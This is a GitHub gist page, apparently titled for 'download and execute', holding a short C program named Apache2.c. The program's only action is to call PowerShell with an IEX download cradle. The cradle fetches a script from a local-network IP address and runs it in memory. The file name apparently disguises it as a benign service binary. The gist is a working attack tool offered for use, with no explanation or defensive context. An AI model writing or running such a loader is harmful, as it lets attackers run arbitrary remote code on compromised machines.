Skip to content

Instantly share code, notes, and snippets.

@robpot891
Created November 17, 2018 06:23
Show Gist options
  • Save robpot891/188b3df1e23fc32f82e67c0cf6070dd6 to your computer and use it in GitHub Desktop.
Save robpot891/188b3df1e23fc32f82e67c0cf6070dd6 to your computer and use it in GitHub Desktop.
dl&e
/* Apache2.c */
#include<stdio.h>
main()
{
system("powershell.exe \"IEX ((new-object net.webclient).downloadstring('http://192.168.100.147/ps.ps1.txt '))\"");
return 0;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment